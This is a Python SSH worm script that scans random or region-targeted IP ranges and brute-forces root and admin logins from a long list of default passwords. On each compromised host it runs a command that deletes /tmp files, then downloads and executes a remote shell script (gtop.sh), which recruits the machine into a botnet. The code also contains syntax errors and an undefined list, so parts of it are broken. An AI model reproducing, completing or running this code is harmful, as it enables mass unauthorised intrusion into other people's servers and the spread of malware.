#!/usr/bin/env python #CREDZ TO 1337INGS AND ~B1NARY~ import threading, paramiko, random, socket, time, sys cmd='cd /tmp; rm -rf *; wget -q http://host/gtop.sh; chmod +x gtop.sh; sh gtop.sh; rm -rf *\r\n' blacklist = [ '127' ] passwords = [ "root:root", "root:lol", "root:admin", "ubnt:ubnt" "root:1234", "admin:1234", "root:toor", "root:sex", "root:test", "pi:pi", "root:cent6" "root:admin", "root:root", "admin:password", "ubnt:ubnt" "root:1234", "root:123", "root:12345", "root:Password", "root:lol", "root:toor", "root:centos7", "root:qwerty", "root:centos6", "root:pussy", "root:user", "root:money", "root:love", "root:1", "root:2", "root:3", "root:0", "root:987", "root:5", "root:beer", "root:cia", "root:fbi", "root:hack", "root:bank", "root:gov", "root:youtube", "root:website", "root:server", "root:weed", "root:420", "root:computer", "root:linux", "root:debain", "root:cent", "root:vps", "root:VPS", "root:light", "root:cap", "root:hat", "root:butt", "root:but", "root:name", "root:god", "root:work", "root:job", "root:bailey", "root:123456", "root:michael", "root:superman", "root:batman", "root:starwars", "root:startrek", "root:desktop", "root:windows", "root:netflix", "root:shoe", "root:foot", "root:tor", "root:rot", "root:roots", "root:root1", "root:root2", "root:root3", "root:root4", "root:root5", "root:root6", "root:root12", "root:root123", "root:root1234", "root:root12345", "root:root123456", "root:iphone", "root:apple", "root:verizon", "root:talktalk", "tim:tim", "root:at&t", "root:strighttalk", "root:|", "root:=", "root:abc", "root:xyz", "root:abc1", "root:abc12", "root:abc123", "root:abc1234", "root:abc12345", "root:abc123456", "root:sync", "root:-", "root:", "root: ", "root:a", "root:z", "root:python", "root:perl", "root:dos", "root:sql", "root:database", "root:minecraft", "root:minecraft1", "root:minecraft2", "root:minecraft3", "root:minecraft4", "root:minecraft5", "root:minecraft6", "root:minecraft7", "root:minecraft8", "root:minecraft9", "root:minecraft0", "root:minecraft12", "root:minecraft123", "root:minecraft1234", "root:minecraft12345", "root:minecraft123456", "root:minecraft1234567" "root:minecraft12345678", "root:minecraft123456789", "root:minecraft1234567890", "root:login", "root:login123", "root:solo", "root:passw0rd", "root:password123", "root:admins", "root:cigs", "root:ruby", "root:html", "root:php", "root:youtuber", "root:pewdiepiefan", "root:pewdiepie", "root:cod", "root:android", "root:phone", "root:pass", "root:school", "root:q", "root:webserver", "root:college", "root:keys", "root:dog", "root:cat", "admin:admin", "admin:admin1", "admin:admin2", "admin:admin3", "admin:admin4", "admin:admin5", "admin:admin6", "admin:admin7", "admin:admin8", "admin:admin9", "admin:admin0", "admin:admin12", "admin:admin123", "admin:admin1234", "admin:admin12345", "admin:admin123456" "admin:admin1234567", "admin:admin12345678", "admin:admin123456789", "admin:admin1234567890", "admin:admin098", "admin:admin987", "admin:admin321", ] #IPRANGES usa = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"] russia = ["122","131","161","37","186","187","31","188","201","2","200"] lsd = ["125.24","125.25","125.26","125.27","125.28","113.53","101.51","101.108","118.175","118.173","182.52","180.180"] shrooms = ["122.178","122.170","182.65","182.68","182.70","182.75","186.112","186.113","186.114","186.115","186.116","186.118" ] xanax = ["23.96","23.97","23.98","23.99","23.100","23.101","23.102","23.103","70.37","104.40","104.41","104.42","104.43","104.44","104.45","104.46","104.47","104.146","104.147","104.208","104.209","104.210","104.210","104.211","104.212","104.213","104.214","104.215","138.91","168.61","168.62","168.63","113.53","125.125","125.126","125.127"] busybox = ["199.180","142.0","158.69"] wholesale = ["208.67"] ecatel = ["89.248"] china = ["65.19","220.248"] india = ["1.6","1.7","1.22","1.23"] cisco = ["1"] cdn = ["217.106","217.106"] ovh = ["5.39","5.135","5.196","8.7","8.18","8.20","8.21","8.24","8.29","8.30","8.33","37.59","37.187","46.105"] lucky = ["125.24","125.25","125.26","125.27","125.28","113.53","101.51","101.108","118.175","118.173","182.52","180.180"] lucky2 = ["122.178","122.170","182.65","182.68","182.70","182.75","186.112","186.113","186.114","186.115","186.116","186.118" ] lucky3 = ["23.96","23.97","23.98","23.99","23.100","23.101","23.102","23.103","70.37","104.40","104.41","104.42","104.43","104.44","104.45","104.46","104.47","104.146","104.147","104.208","104.209","104.210","104.210","104.211","104.212","104.213","104.214","104.215","138.91","168.61","168.62","168.63","113.53","125.125","125.126","125.127"] lucky2 = ["119.91","119.92","119.93","113.53"] lol = ["1","2","5","119","180","113","125","122","46","101",""] load = ["125.25","125.26","125.27","119.92","119.93","180.180","113.53","185.52","122.52","122.53"] god = ["122.52","122.53","119.92","119.93"] br = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"] #PASSFILES if sys.argv[4] == '1': passwords = ["root:root", "root:admin", "root:root", "admin:password", "ubnt:ubnt" "root:1234", "root:123", "root:12345", "root:Password", "root:lol"] if sys.argv[4] == '2': passwords = ["root:toor", "root:centos7", "root:qwerty", "root:centos6", "root:pussy", "root:user", "root:money", "root:love", "root:1", "root:2"] if sys.argv[4] == '3': passwords = ["root:3", "root:0", "root:987", "root:5", "root:beer", "root:cia", "root:fbi", "root:hack", "root:bank", "root:gov", "root:youtube"] if sys.argv[4] == '4': passwords = ["root:website", "root:server", "root:weed", "root:420", "root:computer", "root:linux", "root:debain", "root:cent", "root:vps"] if sys.argv[4] == '5': passwords = ["root:VPS", "root:light", "root:cap", "root:hat", "root:butt", "root:but", "root:name", "root:god", "root:work", "root:job"] if sys.argv[4] == '6': passwords = ["root:bailey", "root:123456", "root:michael", "root:superman", "root:batman", "root:starwars", "root:startrek", "root:desktop"] if sys.argv[4] == '7': passwords = ["root:windows", "root:netflix", "root:shoe", "root:foot", "root:tor", "root:rot", "root:roots", "root:root1", "root:root2"] if sys.argv[4] == '8': passwords = ["root:root3","root:root4","root:root5","root:root6","root:root12","root:root123","root:root1234","root:root12345","root:root123456"] if sys.argv[4] == '9': passwords = ["root:iphone","root:apple","root:verizon","root:talktalk","tim:tim","root:at&t","root:strighttalk","root:|","root:=","root:abc"] if sys.argv[4] == '10': passwords = ["root:xyz","root:abc1","root:abc12","root:abc123","root:abc1234","root:abc12345","root:abc123456","root:sync","root:-","root:"] if sys.argv[4] == '11': passwords = ["root: ","root:a","root:z","root:python","root:perl","root:dos","root:sql","root:database"] if sys.argv[4] == '12': passwords = ["root:minecraft","root:minecraft1""root:minecraft2","root:minecraft3","root:minecraft4","root:minecraft5"] if sys.argv[4] == '13': passwords = ["root:minecraft9","root:minecraft0","root:minecraft12","root:minecraft123","root:minecraft1234","root:minecraft12345","root:minecraft123456"] if sys.argv[4] == '14': passwords = ["root:minecraft6","root:minecraft7","root:minecraft8","root:minecraft1234567","root:minecraft12345678","root:minecraft123456789","root:minecraft1234567890"] if sys.argv[4] == '15': passwords = ["root:login","root:login123","root:solo","root:passw0rd","root:password123","root:admins","root:cigs","root:ruby","root:html","root:php","root:youtuber"] if sys.argv[4] == '16': passwords = ["root:pewdiepiefan","root:pewdiepie","root:cod","root:android","root:phone","root:pass","root:school","root:q","root:webserver","root:college","root:keys"] if sys.argv[4] == '17': passwords = ["root:dog","root:cat"] if sys.argv[4] == '18': passwords = ["admin:admin","admin:admin1","admin:admin2","admin:admin3","admin:admin4","admin:admin5","admin:admin6","admin:admin7","admin:admin8","admin:admin9"] if sys.argv[4] == '19': passwords = ["admin:admin0","admin:admin12","admin:admin123","admin:admin1234","admin:admin12345","admin:admin123456""admin:admin1234567","admin:admin12345678"] if sys.argv[4] == '20': passwords = ["admin:admin123456789","admin:admin1234567890","admin:admin098","admin:admin987","admin:admin321","root:123",] if sys.argv[4] == 'default': passwords = ["root:root", "root:admin", "admin:1234"] if sys.argv[4] == 'lmfao': passwords = ["root:root", "root:toor", "root:admin", "admin:1234", "oracle:oracle", "root:alpine"] if sys.argv[4] == 'routers': passwords = ["root:admin", "root:root", "admin:1234", "admin:password", "cisco:cisco", "netgear:netgear", "cusadmin:password"] if sys.argv[4] == 'perl': passwords = [ "pi:raspberry", "vagrant:vagrant", "ubnt:ubnt" ] if sys.argv[4] == 'ubuntu': passwords = [ "ubnt:ubnt", "ubnt:1234", "ubnt:password" ] if sys.argv[4] == 'root': passwords = [ "root:root","root:test" ] if sys.argv[4] == 'vps1': passwords = [ "root:maxided", "root:centos6svm", "root:123456", "root:Love2020", "root:Zero", "root:Password", "root:password"] if sys.argv[4] == 'vps2': passwords = [ "root:maxided", "root:centos6svm", "root:1234", "root:qwerty", "root:dragon", "root:pussy", "root:baseball"] if sys.argv[4] == 'vps3': passwords = [ "root:maxided", "root:centos6svm", "root:football", "root:monkey", "root:696969", "root:abc123"] if sys.argv[4] == 'r00ted': passwords = [ "localhost:root", "B1NARY:B1NARY", "root:r00tnull3d#", "root:Flunzy2016", "bash:root"] if sys.argv[4] == 'brute': passwords = [ "root:centos6svm", "root:root", "root:toor", "root:abc123", "root:maxided"] if sys.argv[4] == 'lol': passwords = [ "admin:1234"] #IP CLASS ipclassinfo = sys.argv[2] if ipclassinfo == "A": ip1 = sys.argv[3] elif ipclassinfo == "B": ip1 = sys.argv[3].split(".")[0] ip2 = sys.argv[3].split(".")[1] elif ipclassinfo == "C": ips = sys.argv[3].split(".") num=0 for ip in ips: num=num+1 if num == 1: ip1 = ip elif num == 2: ip2 = ip elif num == 3: ip3 = ip class sshscanner(threading.Thread): global passwords global ipclassinfo if ipclassinfo == "A": global ip1 elif ipclassinfo == "B": global ip1 global ip2 elif ipclassinfo == "C": global ip1 global ip2 global ip3 def run(self): while 1: try: while 1: thisipisbad='no' if ipclassinfo == "A": self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "B": self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "C": self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256)) elif ipclassinfo == "LUCKY1": self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "LUCKY2": self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "LUCKY3": self.host = random.choice(lucky3)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "USA": self.host = random.choice(usa)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "BRAZIL": self.host = random.choice(br)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "RUSSIA": self.host = random.choice(russia)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "LSD": self.host = random.choice(lsd)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "SHROOMS": self.host = random.choice(shrooms)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "XANAX": self.host = random.choice(xanax)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "CISCO": self.host = random.choice(cisco)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "BUSYBOX": self.host = random.choice(busybox)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "OVH": self.host = random.choice(ovh)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "WHOLESALE": self.host = random.choice(wholesale)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "ECATEL": self.host = random.choice(ecatel)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "CHINA": self.host = random.choice(china)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "INDIA": self.host = random.choice(india)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "CDN": self.host = random.choice(cdn)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "AWS" self.host = random.choice(aws)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "RANDOM": self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) else: self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) for badip in blacklist: if badip in self.host: thisipisbad='yes' if thisipisbad=='no': break username='root' password="" port = 22 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(3) s.connect((self.host, port)) s.close() ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) dobreak=False for passwd in passwords: if ":n/a" in passwd: password="" else: password=passwd.split(":")[1] if "n/a:" in passwd: username="" else: username=passwd.split(":")[0] try: ssh.connect(self.host, port = port, username=username, password=password, timeout=3) dobreak=True break except: pass if True == dobreak: break badserver=True stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig") output = stdout.read() if "inet addr" in output: badserver=False if badserver == False: print '\x1b[31mINFECTING:'+self.host+'|'+username+'|'+password+'|'+str(port) ssh.exec_command(""+cmd+"") time.sleep(20) ssh.close() except: pass for x in range(0,int(sys.argv[1])): try: t = sshscanner() t.start() except: pass